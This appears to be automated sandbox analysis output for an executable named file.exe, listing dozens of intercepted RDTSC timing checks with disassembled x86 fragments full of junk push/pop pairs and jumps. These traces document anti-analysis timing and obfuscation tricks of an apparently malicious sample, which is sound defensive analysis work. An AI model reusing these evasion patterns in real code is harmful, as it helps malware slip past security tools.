Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0EED4 second address: A0EEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F8FA0CCCDDDh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F20F second address: A0F22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8FA106A484h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F22B second address: A0F238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F8FA0CCCDDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F238 second address: A0F25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F8FA106A476h 0x0000000c jmp 00007F8FA106A488h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F866 second address: A0F86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F86B second address: A0F8AA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8FA106A485h 0x00000008 jno 00007F8FA106A478h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F8FA106A47Bh 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e jnp 00007F8FA106A47Eh 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FD56 second address: A0FD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E888 second address: A0E88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E88E second address: A0E892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E892 second address: A0E89C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FA106A476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17524 second address: A17562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F8FA0CCCDDAh 0x0000000f pushad 0x00000010 jmp 00007F8FA0CCCDE1h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F8FA0CCCDE0h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A19119 second address: A19126 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24ABE second address: A24AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDE5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jc 00007F8FA0CCCDDAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29A9C second address: A29AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29AA2 second address: A29ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F8FA0CCCDE5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29ABC second address: A29AC6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA106A47Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29AC6 second address: A29AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 jmp 00007F8FA0CCCDE6h 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F8FA0CCCDDEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29AF0 second address: A29B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F8FA106A47Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2C254 second address: A2C26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8FA0CCCDD6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e jnc 00007F8FA0CCCDD6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2C26A second address: A2C28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FA106A476h 0x0000000a popad 0x0000000b je 00007F8FA106A483h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8FA106A47Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3126C second address: A31270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A38D23 second address: A38D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A38D29 second address: A38D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007F8FA0CCCDD6h 0x00000010 popad 0x00000011 jc 00007F8FA0CCCDDAh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jnc 00007F8FA0CCCDD6h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A38D52 second address: A38D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A38D58 second address: A38D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F8FA0CCCDDEh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A414F3 second address: A4150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F8FA106A480h 0x0000000c pop eax 0x0000000d push esi 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4150F second address: A4151A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4151A second address: A41520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3FFC0 second address: A3FFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3FFC6 second address: A3FFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A40132 second address: A40138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A403EE second address: A403F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A403F4 second address: A403FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A406A1 second address: A406A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A406A7 second address: A406C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8FA0CCCDE5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A406C3 second address: A406CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A406CB second address: A406D8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4122E second address: A41234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A449AF second address: A449B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A44B36 second address: A44B42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FA106A47Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A553AE second address: A553B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62448 second address: A6244C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6244C second address: A6245E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6245E second address: A62462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B0BE second address: A7B0C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B0C4 second address: A7B0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B0C8 second address: A7B0EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8FA0CCCDE8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B36E second address: A7B3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A484h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push esi 0x00000010 ja 00007F8FA106A476h 0x00000016 pop esi 0x00000017 popad 0x00000018 nop 0x00000019 mov dx, 9BD5h 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F8FA106A478h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 push 508EFC08h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B3C3 second address: A7B3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7C882 second address: A7C88C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8FA106A482h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7DED8 second address: A7DEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FA0CCCDD6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7DEE6 second address: A7DEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7FCDD second address: A7FD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDE6h 0x00000009 popad 0x0000000a jmp 00007F8FA0CCCDE4h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5023F second address: 4B50245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50245 second address: 4B50249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50249 second address: 4B50287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F8FA106A482h 0x00000015 sub al, 00000018h 0x00000018 jmp 00007F8FA106A47Bh 0x0000001d popfd 0x0000001e mov bh, cl 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50287 second address: 4B502C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FA0CCCDE0h 0x00000008 mov si, 1751h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F8FA0CCCDDCh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 call 00007F8FA0CCCDDEh 0x0000001d push esi 0x0000001e pop ebx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502C6 second address: 4B502CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50314 second address: 4B50318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50318 second address: 4B5031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5031E second address: 4B5034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FA0CCCDE5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5034D second address: 4B5035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FA106A47Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5035D second address: 4B50361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50361 second address: 4B50371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50371 second address: 4B50389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50389 second address: 4B503AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FA106A480h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503AD second address: 4B503B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503B1 second address: 4B503B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503B7 second address: 4B503BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503BD second address: 4B503C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA3F5 second address: 9AA3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA3FB second address: 9AA406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5045F second address: 4B50465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50465 second address: 4B50476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FA106A47Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50476 second address: 4B5047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B504D4 second address: 4B504FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8FA106A47Dh 0x0000000a adc si, E1A6h 0x0000000f jmp 00007F8FA106A481h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B504FE second address: 4B50504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50504 second address: 4B50508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50508 second address: 4B5056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 11FDF00Fh 0x00000010 jmp 00007F8FA0CCCDDFh 0x00000015 add dword ptr [esp], 639B2C19h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F8FA0CCCDDBh 0x00000025 sbb cl, 0000003Eh 0x00000028 jmp 00007F8FA0CCCDE9h 0x0000002d popfd 0x0000002e mov esi, 27D2A187h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5056E second address: 4B50573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B505D8 second address: 4B505DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B505DE second address: 4B505E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B505E4 second address: 4B505E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B505E8 second address: 4B50620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edx] 0x0000000a jmp 00007F8FA106A484h 0x0000000f inc edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8FA106A487h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50620 second address: 4B50620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F8FA0CCCDDBh 0x0000000b sbb cl, 0000007Eh 0x0000000e jmp 00007F8FA0CCCDE9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 pushad 0x0000001a mov dx, si 0x0000001d pushfd 0x0000001e jmp 00007F8FA0CCCDE8h 0x00000023 add ax, 24A8h 0x00000028 jmp 00007F8FA0CCCDDBh 0x0000002d popfd 0x0000002e popad 0x0000002f jne 00007F8FA0CCCD3Eh 0x00000035 mov al, byte ptr [edx] 0x00000037 jmp 00007F8FA0CCCDE4h 0x0000003c inc edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F8FA0CCCDE7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50739 second address: 4B5074E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5074E second address: 4B5076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 1A2Eh 0x00000011 mov cx, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5076F second address: 4B5079E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8FA106A487h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5079E second address: 4B50803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8FA0CCCDDFh 0x00000009 xor eax, 3627A4EEh 0x0000000f jmp 00007F8FA0CCCDE9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F8FA0CCCDE0h 0x0000001b add eax, 7DDC8C68h 0x00000021 jmp 00007F8FA0CCCDDBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a jne 00007F9011A9505Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50803 second address: 4B50807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
